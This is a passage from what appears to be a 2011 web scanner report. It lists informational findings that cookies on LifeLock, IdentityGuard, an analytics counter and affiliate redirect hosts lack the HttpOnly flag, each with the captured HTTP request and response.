Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:24 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/
Vary: Accept-Encoding
Content-Length: 1587

#header .logo{left:23px;top:23px;width:202px;height:56px;background-image:url(https://cdn.lifelock.com/assets/secure/images/lifelock-logo.png);}h2.step-1,h2.step-2,h2.step-3,h2.step-4{background-image
...[SNIP]...

14.68. https://secure.lifelock.com/styles/webstore.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/webstore.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS376161

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/webstore.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:24 GMT
ETag: W/"23213-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:24 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/
Vary: Accept-Encoding
Content-Length: 23213

body,form,fieldset,legend,object,img,iframe,table,td,th,ul,li,ol,h1,h2,h3,h4,h5,h6,p,blockquote{margin:0;padding:0;border:0;vertical-align:middle;}table{border-collapse:collapse;border-spacing:0;}ul,o
...[SNIP]...

14.69. http://stats.kroogy.com/cnt-gif1x1.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.kroogy.com
Path:   /cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt-gif1x1.php?e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home HTTP/1.1
Host: stats.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 12:25:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: cnscc=1303647928; expires=Tue, 24-Apr-2012 23:59:59 GMT; path=/
Location: ./cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home
Pragma: no-cache
Cache-control: no-cache
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31

<html><body>Moved</body></html>

14.70. http://stats.kroogy.com/cnt-gif1x1.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.kroogy.com
Path:   /cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home HTTP/1.1
Host: stats.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943; cnscc=1303647928

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: cnsuser_id=2425920106; expires=Tue, 24-Apr-2012 23:59:59 GMT; path=/
Pragma: no-cache
Cache-control: no-cache
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.71. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apmebf.com
Path:   /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G?b=u4up%3DsupLm%2Bupqz5u5A%2B5tqr5%2B3q4063oq_03pq3uzsFG--ECDD-CG-EF--EC-DC-CGOPD%2663x%3Dt5514%25FM%25ER%25ER888.qo0z46yq3.q26urm9.o0y%25ERo0z46yq3%25ERxmzpuzs.qt5yx%25FR%25EHHq45m35%25FP%25EIo0y1mzAZmyq%25FPov_q4z1F3%3C%3Ct551%3A%2F%2F888.w2BArv.o0y%3AKC%2Foxuow-DLDDLID-DCJHDLKJ%3C%3CS%3C%3C HTTP/1.1
Host: www.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.apmebf.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 24 Apr 2011 03:10:07 GMT
Location: http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu%2Bsftpvsdf_psefsjoh45--3122-15-34--31-21-15DE2%26vsm%3Diuuqt%254B%253G%253Gxxx.fdpotvnfs.frvjgby.dpn%253Gdpotvnfs%253Gmboejoh.fiunm%254G%25366ftubsu%254E%2537dpnqbozObnf%254Edk_ftoq4s<dkp!x7ry-t2xepAz<iuuq%3A%2F%2Fxxx.lr0zgk.dpn%3A91%2Fdmjdl-2A22A72-21862A98<<H<<
Set-Cookie: LCLK=cjo!w6qx-s1wdo9y; domain=.apmebf.com; path=/; expires=Fri, 22-Apr-2016 03:10:07 GMT
Content-Type: text/html
Connection: close
Date: Sun, 24 Apr 2011 03:10:07 GMT
Content-Length: 983

<html>
<head><meta http-equiv="redirect" content="http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu
...[SNIP]...

14.72. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emjcd.com
Path:   /5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu%2Bsftpvsdf_psefsjoh45--3122-15-34--31-21-15DE2%26vsm%3Diuuqt%254B%253G%253Gxxx.fdpotvnfs.frvjgby.dpn%253Gdpotvnfs%253Gmboejoh.fiunm%254G%25366ftubsu%254E%2537dpnqbozObnf%254Edk_ftoq4s%3Cdkp!x7ry-t2xepAz%3Ciuuq%3A%2F%2Fxxx.lr0zgk.dpn%3A91%2Fdmjdl-2A22A72-21862A98%3C%3CH%3C%3C HTTP/1.1
Host: www.emjcd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.emjcd.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 24 Apr 2011 03:10:08 GMT
Location: https://www.econsumer.equifax.com/consumer/landing.ehtml?%5estart=&companyName=cj_esnp3r&AID=10751987&PID=1911961&SID=gid9a+identity+theft+resource_ordering34--2011-04-23--20-10-04CD1
Set-Cookie: LCLK=cjo!w6qx-s1wdo9y; domain=.emjcd.com; path=/; expires=Fri, 22-Apr-2016 03:10:08 GMT
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.emjcd.com; path=/; expires=Fri, 22-Apr-2016 03:10:08 GMT
Set-Cookie: PBLP=1501737:1911961:1303614608209; path=/; expires=Fri, 22-Apr-2016 03:10:08 GMT
Content-Type: text/html
Connection: close
Date: Sun, 24 Apr 2011 03:10:08 GMT
Content-Length: 517

<html>
<head><meta http-equiv="redirect" content="https://www.econsumer.equifax.com/consumer/landing.ehtml?%5estart=&amp;companyName=cj_esnp3r&amp;AID=10751987&amp;PID=1911961&amp;SID=gid9a+identity+t
...[SNIP]...

14.73. http://www.googleadservices.com/pagead/aclk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&client=ca-pub-6888065668292638&val=ChAyMmZiYTMwMDE2MDEwMDhkEJSfre0EGghI3SWftmaJ_yABKAE&sig=AGiWqtzICqiMDTo80UkKP6AzOKgkaHuSwA&adurl=http://clk.atdmt.com/go/253732016/direct%3Bai.194941096%3Bct.1/01 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_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--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_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--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=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; expires=Tue, 24-May-2011 12:32:36 GMT; path=/pagead/conversion/1033861443/
Cache-Control: private
Location: http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 12:32:36 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


14.74. http://www.identityguard.com/gscc.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /gscc.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gscc.aspx?mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: www.identityguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: URLParams=mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; cmTPSet=Y; CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.1.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615498489

Response